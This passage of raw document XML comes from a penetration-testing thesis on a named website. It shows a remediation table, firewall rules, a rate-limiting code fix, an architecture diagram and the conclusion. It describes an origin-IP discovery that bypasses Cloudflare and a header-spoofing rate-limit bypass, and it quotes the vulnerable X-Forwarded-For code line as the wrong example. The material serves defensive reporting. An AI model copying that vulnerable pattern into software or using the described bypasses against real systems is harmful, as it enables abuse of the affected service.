              <w:t>N-013/014 2FA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Enable two-factor authentication on cPanel + WHM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>30 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**P2 — 1 week**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>N-010 Wildcard DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Remove wildcard DNS record</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>15 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**P2 — 1 week**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>N-016 Dir listing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Add `Options -Indexes` to Apache config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>15 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**P2 — 1 week**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>N-009 CSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Remove unsafe-inline from script-src</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>4 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**P3 — 1 month**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>N-012 SPF/DMARC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Set SPF to `-all`, DMARC to `p=reject`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>30 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**P3 — 1 month**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>N-007 JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Add device fingerprint or Turnstile to token endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1 day</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**P3 — 1 month**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>N-004 Hosting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Plan migration to dedicated isolated infrastructure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Ongoing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 13: Remediation priority matrix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Implementing P0 actions alone — which require approximately 90 minutes total — eliminates all four Critical findings and reduces the overall risk posture by the equivalent of 40 CVSS score points.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.5.2 Firewall Rules (P0 — Most Critical)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The fastest and highest-impact remediation is applying firewall rules to block administrative ports from public access. On Cloudways, this can be done via the Platform → Server → Security → IP Whitelist dashboard, which is more reliable than OS-level rules:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Using UFW on the Ubuntu server:</w:t>
        <w:br/>
        <w:t>ufw allow from [trusted-management-ip] to any port 22</w:t>
        <w:br/>
        <w:t>ufw deny 2083</w:t>
        <w:br/>
        <w:t>ufw deny 2087</w:t>
        <w:br/>
        <w:t>ufw deny 2096</w:t>
        <w:br/>
        <w:t>ufw deny 9001</w:t>
        <w:br/>
        <w:t>ufw deny 3306</w:t>
        <w:br/>
        <w:t>ufw allow from [trusted-admin-ip] to any port 2083</w:t>
        <w:br/>
        <w:t>ufw allow from [trusted-admin-ip] to any port 2087</w:t>
        <w:br/>
        <w:t>ufw enable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This single configuration change eliminates findings N-001, N-002, N-013, N-014, and N-015 in approximately 30 minutes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.5.3 Rate Limiting Fix (P1 — Critical Within 24 Hours)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The root cause of N-005 is using X-Forwarded-For for rate limiting instead of CF-Connecting-IP:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>// WRONG — client can spoof this value:</w:t>
        <w:br/>
        <w:t>const clientIP = req.headers['x-forwarded-for']?.split(',')[0];</w:t>
        <w:br/>
        <w:br/>
        <w:t>// CORRECT — Cloudflare sets this; the client cannot spoof it:</w:t>
        <w:br/>
        <w:t>const clientIP = req.headers['cf-connecting-ip']</w:t>
        <w:br/>
        <w:t xml:space="preserve">              || req.headers['x-forwarded-for']?.split(',')[0]</w:t>
        <w:br/>
        <w:t xml:space="preserve">              || req.socket.remoteAddress;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>In the Cloudflare dashboard, under Rate Limiting rules, select "True Client IP (CF-Connecting-IP)" as the rate-limiting identifier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.5.4 Long-Term Security Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The underlying cause of 59% of findings in this engagement is a network architecture where database and administrative services are exposed on the same public IP as web services, with no network-level segregation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Recommended architecture:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  Internet → [Cloudflare WAF] → DMZ: Web servers (80/443 only)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  DMZ → [Internal firewall] → Application Layer: API servers</w:t>
        <w:br/>
        <w:t xml:space="preserve">  Application → [Strict firewall] → Data Layer: MySQL (no external access)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  Management: cPanel, WHM, SSH → VPN ONLY (no public internet access)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Moving to dedicated hosting with proper network segmentation would eliminate the shared hosting lateral movement risk, the exposed admin panels, and the publicly accessible database in a single infrastructure change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CHAPTER 6: CONCLUSION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.1 Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This thesis presented a complete black-box Vulnerability Assessment and Penetration Testing engagement on neuralsh.com, conducted under the supervision of Prestige Alliance Co., Ltd. Beginning with no credentials, source code, or internal documentation, the assessment mapped the full external attack surface of the target using DNS enumeration, port scanning, service fingerprinting, manual web application testing, and controlled exploitation. The engagement identified 20 distinct vulnerabilities — 4 Critical, 5 High, 7 Medium, and 4 Low severity — and confirmed the successful exploitation of two attack chains.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The origin server IP was discovered through a three-step DNS analysis chain, bypassing the Cloudflare WAF entirely and directly exposing the backend infrastructure hosting WHM, cPanel, MySQL, and MikroTik administration panels — all publicly accessible without IP restriction. The most actionable finding was a rate-limiting bypass that achieved a 100% bypass rate through a single HTTP header manipulation, enabling unlimited API token farming with zero defensive responses from the application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.2 Key Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The four Critical findings together represent a complete server compromise path available to any unauthenticated internet attacker:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1. WHM (CVSS 10.0) — Root-equivalent server access if credentials obtained via brute force or phishing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2. cPanel (CVSS 9.8) — Full hosting account control; password reset flow available to any attacker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3. MySQL (CVSS 9.8) — Direct database access from public internet; brute-force attack surface with no network barrier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4. MikroTik (CVSS 9.1) — Full network infrastructure control if default credentials remain active</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The rate-limiting bypass (N-005) was the most immediately exploitable finding: trivial to execute, 100% effective, and fixable with a one-line code change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.3 Exploitation Summary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74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
